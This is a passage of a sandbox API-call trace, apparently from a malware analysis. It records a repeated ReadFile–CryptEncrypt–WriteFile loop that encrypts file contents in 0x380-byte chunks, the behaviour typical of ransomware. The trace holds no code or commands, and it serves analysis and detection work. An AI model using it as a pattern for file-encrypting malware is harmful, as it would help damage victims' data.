lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.558] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.558] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.559] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.559] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.560] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.560] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.561] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.561] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.562] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.562] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.563] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.563] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.564] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.564] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] CryptEncrypt (in: hKey=0x2fb688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5d1b0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0278.565] WriteFile (in: hFile=0x5d48, lpBuffer=0x2f5d1b0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5d1b0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0278.565] ReadFile (in: hFile=0x5d3c, lpBuffer=0x2f5d1b0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, 